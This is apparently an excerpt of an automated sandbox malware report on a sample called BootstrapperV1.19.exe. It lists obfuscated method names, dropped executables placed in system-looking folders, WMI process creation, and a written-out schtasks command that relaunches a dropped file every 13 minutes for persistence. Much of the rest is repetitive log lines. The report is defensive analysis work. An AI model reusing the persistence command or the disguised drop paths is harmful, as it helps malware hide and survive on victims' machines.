                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, LlLKQn71aVmc9JVx6ss.csHigh entropy of concatenated method names: 'fm07LtW1Ee', 'PLW7NjNorw', 'PXN7X2oKeL', 'oIN7QN0FfI', 'syN7aW7rlt', 'p1BfR7dBNONJlPyDtyEQ', 'GQdKZ3dBDHJWrlMu4tG6', 'eAsm1ydBLnGNXnmZ4BT0', 'SdAtaDdBX1PFdvIwq1OZ', 'HI2H0edBQjFgDYrGlSyR'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, bNTRJ3srWwX2TLEWO1h.csHigh entropy of concatenated method names: 'YT6bwfd1FNj2CLVWSewq', 'PmGBlCd1vEGTv4qedXcJ', 'cU47t1d1hr4l97cCaMQN', 'nXlJUfd16BxFgBXQxyIP', 'KAas1HcMla', 'Mh9', 'method_0', 'J2AsDwc4Bd', 'hjXsLSEiWT', 'OV9sNR7syA'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, Ca29H4wrWuOnYGI7ufA.csHigh entropy of concatenated method names: 'RAc2kXnqD3', 'gmIqkKdZ2QxfJL9a4hGB', 'K9qDYwdZJJ33EK1XuPVg', 'bjDQiYdZGuwoev0o7J9l', 'mExsJgdZcyh9Hvsv5Db2', 'hGacMIdZdSq0xDhpyWS9', 'WXjbFsdZweENJi62S7Yu', 'nSDIvEdZkIPraT1wcqvO', 'olI2ifJwVJ', 'Def2wDRTab'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, W0oqHaYJi0X4y3dgfHf.csHigh entropy of concatenated method names: 'kgyYcSeyMr', 'xoXYk0iCH1', 's9QYlOip6B', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'uUbYMyOABu'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, qO2H4fJ0BQS3WXlNP0W.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'JMKdlJ6cXUF', 'RdIdJdHUcs6', 'L79Eg1dYnuhUk3dbgb01', 'dxEyxLdY3Sf36lQ4Rlu5', 'Qb9abSdYmY9DiKsM61NT', 'LlWriqdYCCZufZWejjBy', 'OFvJRbdYVYfVCEdpGS2Q'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, D3KXRsDmtylPWFs6gBf.csHigh entropy of concatenated method names: 'eZudl8U33TV', 'g9EdcSg6qtI', 'cS887ydXpyrmfd1M0Jm7', 'ppfiUGdXycx4xRAlo8KY', 'pXWOTedXIZVpTAZYnuHM', 'J4kaZudXeKJSZIeVhIPX', 'q3LKeLdXSjN4bmL7Ho2Y', 'MgEdAadX8iXoI2ebN1U5', 'imethod_0', 'g9EdcSg6qtI'

                                    Persistence and Installation Behavior

                                    barindex
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Users\user\Desktop\QWdDhtsw.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile created: C:\Users\user\Desktop\wLNGnQCR.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Windows\ELAMBKUP\SIHClient.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeFile created: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile created: C:\Users\user\Desktop\FtgWXsHz.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Users\user\Desktop\qHDXlZnr.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Users\user\Desktop\nFQoPqiw.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeFile created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exeJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile created: C:\Users\user\Desktop\gjQRaIsv.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Users\user\Desktop\GnKnxRmO.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile created: C:\Users\user\Desktop\VMFLzOzY.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Users\Default\AppData\RuntimeBroker.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeFile created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Windows\ELAMBKUP\SIHClient.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Users\user\Desktop\nFQoPqiw.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Users\user\Desktop\qHDXlZnr.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Users\user\Desktop\QWdDhtsw.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile created: C:\Users\user\Desktop\GnKnxRmO.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile created: C:\Users\user\Desktop\VMFLzOzY.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile created: C:\Users\user\Desktop\gjQRaIsv.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile created: C:\Users\user\Desktop\FtgWXsHz.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile created: C:\Users\user\Desktop\wLNGnQCR.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
